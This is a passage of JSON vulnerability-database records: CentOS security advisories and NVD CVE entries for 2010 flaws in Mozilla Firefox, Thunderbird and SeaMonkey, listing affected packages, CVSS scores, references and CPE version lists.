allowing an attacker to conduct a man-in-the-middle attack.\n(CVE-2010-3170)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthese issues. After installing the update, SeaMonkey must be restarted for\nthe changes to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017105.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017106.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017111.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017112.html\n\n**Affected packages:**\nseamonkey\nseamonkey-chat\nseamonkey-devel\nseamonkey-dom-inspector\nseamonkey-js-debugger\nseamonkey-mail\nseamonkey-nspr\nseamonkey-nspr-devel\nseamonkey-nss\nseamonkey-nss-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0781.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-10-25T08:12:58", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "seamonkey security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3177", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3173", "CVE-2010-3182", "CVE-2010-3170"], "modified": "2010-10-25T08:20:46", "href": "http://lists.centos.org/pipermail/centos-announce/2010-October/017105.html", "id": "CESA-2010:0781", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:24:32", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0780.html", "https://rhn.redhat.com/errata/RHSA-2010-0780.htm", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4.centos", "packageFilename": "thunderbird-1.5.0.12-31.el4.centos.x86_64.rpm", "packageName": "thunderbird", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4.centos", "packageFilename": "thunderbird-1.5.0.12-31.el4.centos.src.rpm", "packageName": "thunderbird", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4.centos", "packageFilename": "thunderbird-1.5.0.12-31.el4.centos.src.rpm", "packageName": "thunderbird", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4.centos", "packageFilename": "thunderbird-1.5.0.12-31.el4.centos.i386.rpm", "packageName": "thunderbird", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.24-9.el5.centos", "packageFilename": "thunderbird-2.0.0.24-9.el5.centos.x86_64.rpm", "packageName": "thunderbird", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.24-9.el5.centos", "packageFilename": "thunderbird-2.0.0.24-9.el5.centos.i386.rpm", "packageName": "thunderbird", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.24-9.el5.centos", "packageFilename": "thunderbird-2.0.0.24-9.el5.centos.src.rpm", "packageName": "thunderbird", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.0.0.24-9.el5.centos", "packageFilename": "thunderbird-2.0.0.24-9.el5.centos.src.rpm", "packageName": "thunderbird", "arch": "any", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0780\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail content.\nAn HTML mail message containing malicious content could cause Thunderbird\nto crash or, potentially, execute arbitrary code with the privileges of the\nuser running Thunderbird. (CVE-2010-3176, CVE-2010-3180)\n\nNote: JavaScript support is disabled by default in Thunderbird. The above\nissues are not exploitable unless JavaScript is enabled.\n\nA flaw was found in the script that launches Thunderbird. The\nLD_LIBRARY_PATH variable was appending a \".\" character, which could allow a\nlocal attacker to execute arbitrary code with the privileges of a different\nuser running Thunderbird, if that user ran Thunderbird from within an\nattacker-controlled directory. (CVE-2010-3182)\n\nAll Thunderbird users should upgrade to this updated package, which\nresolves these issues. All running instances of Thunderbird must be\nrestarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017091.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017092.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017109.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-October/017110.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\n\nhttps://rhn.redhat.com/errata/RHSA-2010-0780.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-10-20T10:21:34", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "thunderbird security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3182"], "modified": "2010-10-25T08:19:16", "href": "http://lists.centos.org/pipermail/centos-announce/2010-October/017091.html", "id": "CESA-2010:0780", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2017-09-19T13:37:04", "references": ["https://bugzilla.mozilla.org/show_bug.cgi?id=590291", "http://www.securityfocus.com/bid/44245", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://www.ubuntu.com/usn/USN-997-1", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-64.html", "http://www.ubuntu.com/usn/USN-998-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=590116", "https://bugzilla.mozilla.org/show_bug.cgi?id=554670", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:211", "http://support.avaya.com/css/P8/documents/100120156", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html"], "description": "Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 3.6.x before 3.6.11 and Thunderbird 3.1.x before 3.1.5 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:02", "title": "CVE-2010-3175", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11943", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11943"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3175"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11943", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11943"}], "modified": "2017-09-18T21:31:16", "cpe": ["cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:firefox:3.6.6"], "id": "CVE-2010-3175", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3175", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:37:04", "references": ["http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://www.ubuntu.com/usn/USN-997-1", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=583077", "http://www.ubuntu.com/usn/USN-998-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://www.debian.org/security/2010/dsa-2124", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-65.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:211", "http://support.avaya.com/css/P8/documents/100120156", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html"], "description": "Stack-based buffer overflow in the text-rendering functionality in Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a long argument to the document.write method.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:03", "title": "CVE-2010-3179", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11675", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11675"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3179"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11675", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11675"}], "modified": "2017-09-18T21:31:16", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.9", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:2.0.0.18", "cpe:/a:mozilla:firefox:2.0.0.8", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:thunderbird:3.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:thunderbird:2.0.0.21", "cpe:/a:mozilla:seamonkey:1.1:beta", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:firefox:2.0.0.3", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:2.0.0.2", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:thunderbird:2.0.0.22", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0:preview_release", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:2.0.0.20", "cpe:/a:mozilla:thunderbird:3.1", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:2.0.0.7", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:thunderbird:2.0.0.23", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:seamonkey:1.1:alpha", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:thunderbird:2.0.0.19", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:2.0.0.7", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:1.5.0.13", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:3.0.16", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:seamonkey:1.0:alpha", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.12", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0", "cpe:/a:mozilla:firefox:2.0.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:2.0.0.5", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:thunderbird:1.5.0.14", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:thunderbird:2.0.0.17", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:thunderbird:1.5.0.5", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:firefox:2.0.0.19", "cpe:/a:mozilla:firefox:3.0.17", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:firefox:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:2.0.0.18", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2010-3179", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3179", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:37:07", "references": ["http://www.ubuntu.com/usn/usn-1011-1", "http://isc.sans.edu/diary.html?storyid=9817", "http://www.exploit-db.com/exploits/15342", "http://www.exploit-db.com/exploits/15341", "https://bugzilla.mozilla.org/show_bug.cgi?id=607222#c53", "http://support.avaya.com/css/P8/documents/100114335", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:213", "http://www.mozilla.org/security/announce/2010/mfsa2010-73.html", "https://rhn.redhat.com/errata/RHSA-2010-0812.html", "http://www.ubuntu.com/usn/USN-1011-3", "http://www.securitytracker.com/id?1024650", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:219", "http://www.vupen.com/english/advisories/2010/2857", "http://www.redhat.com/support/errata/RHSA-2010-0810.html", "http://blog.mozilla.com/security/2010/10/26/critical-vulnerability-in-firefox-3-5-and-firefox-3-6/", "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.securityfocus.com/bid/44425", "http://www.norman.com/about_norman/press_center/news_archive/2010/129223/", "http://www.vupen.com/english/advisories/2010/2871", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://www.vupen.com/english/advisories/2010/2837", "http://norman.com/about_norman/press_center/news_archive/2010/129223/en?utm_source=twitterfeed&utm_medium=twitter", "http://www.redhat.com/support/errata/RHSA-2010-0808.html", "http://www.redhat.com/support/errata/RHSA-2010-0809.html", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "http://www.exploit-db.com/exploits/15352", "http://www.securitytracker.com/id?1024645", "http://www.debian.org/security/2010/dsa-2124", "https://bugzilla.redhat.com/show_bug.cgi?id=646997", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "http://slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.556706", "https://bugzilla.mozilla.org/show_bug.cgi?id=607222", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050061.html", "http://www.vupen.com/english/advisories/2010/2864", "http://www.ubuntu.com/usn/USN-1011-2", "http://www.norman.com/security_center/virus_description_archive/129146/", "http://lists.fedoraproject.org/pipermail/package-announce/2010-November/050233.html", "http://support.avaya.com/css/P8/documents/100114329", "http://www.vupen.com/english/advisories/2011/0061", "http://www.securitytracker.com/id?1024651"], "description": "Mozilla Firefox 3.5.x through 3.5.14 and 3.6.x through 3.6.11, Thunderbird 3.1.6 before 3.1.6 and 3.0.x before 3.0.10, and SeaMonkey 2.x before 2.0.10, when JavaScript is enabled, allows remote attackers to execute arbitrary code via vectors related to nsCSSFrameConstructor::ContentAppended, the appendChild method, incorrect index tracking, and the creation of multiple frames, which triggers memory corruption, as exploited in the wild in October 2010 by the Belmoo malware.", "edition": 2, "reporter": "NVD", "published": "2010-10-27T20:00:05", "title": "CVE-2010-3765", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:07", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12108", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12108"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3765"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12108", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:12108"}], "modified": "2017-09-18T21:31:32", "cpe": ["cpe:/a:mozilla:thunderbird:3.0.6", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:thunderbird:3.0.2", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:firefox:3.5.12", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:3.5.14", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:firefox:3.6.7", "cpe:/a:mozilla:firefox:3.6.2", "cpe:/a:mozilla:firefox:3.5.13", "cpe:/a:mozilla:thunderbird:3.0.7", "cpe:/a:mozilla:firefox:3.6.4", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.6", "cpe:/a:mozilla:thunderbird:3.1.3", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:thunderbird:3.0.3", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:firefox:3.6.8", "cpe:/a:mozilla:thunderbird:3.0.8", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:firefox:3.6.3", "cpe:/a:mozilla:thunderbird:3.1.1", "cpe:/a:mozilla:firefox:3.6.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:thunderbird:3.1.2", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:thunderbird:3.0.4", "cpe:/a:mozilla:seamonkey:2.0.9", "cpe:/a:mozilla:thunderbird:3.1.5", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:firefox:3.5.8", "cpe:/a:mozilla:thunderbird:3.0.5", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:thunderbird:3.1.4", "cpe:/a:mozilla:firefox:3.5.11", "cpe:/a:mozilla:firefox:3.6.11", "cpe:/a:mozilla:thunderbird:3.0.9", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:thunderbird:3.0.1", "cpe:/a:mozilla:firefox:3.5.9", "cpe:/a:mozilla:firefox:3.6.10", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:3.5.10", "cpe:/a:mozilla:firefox:3.6.6", "cpe:/a:mozilla:seamonkey:2.0.1"], "id": "CVE-2010-3765", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3765", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-19T13:37:04", "references": ["http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_mozilla_firefox", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050077.html", "http://www.redhat.com/support/errata/RHSA-2010-0861.html", "http://www.securityfocus.com/bid/44252", "http://www.ubuntu.com/usn/USN-997-1", "http://www.redhat.com/support/errata/RHSA-2010-0896.html", "http://www.ubuntu.com/usn/USN-998-1", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:210", "http://www.mozilla.org/security/announce/2010/mfsa2010-69.html", "http://www.debian.org/security/2010/dsa-2124", "http://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=576616", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:211", "http://support.avaya.com/css/P8/documents/100120156", "http://www.vupen.com/english/advisories/2011/0061", "http://www.redhat.com/support/errata/RHSA-2010-0782.html"], "description": "Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 do not properly handle certain modal calls made by javascript: URLs in circumstances related to opening a new window and performing cross-domain navigation, which allows remote attackers to bypass the Same Origin Policy via a crafted HTML document.", "edition": 2, "reporter": "NVD", "published": "2010-10-21T15:00:03", "title": "CVE-2010-3178", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:37:04", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12120", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12120"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3178"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:12120", "href": 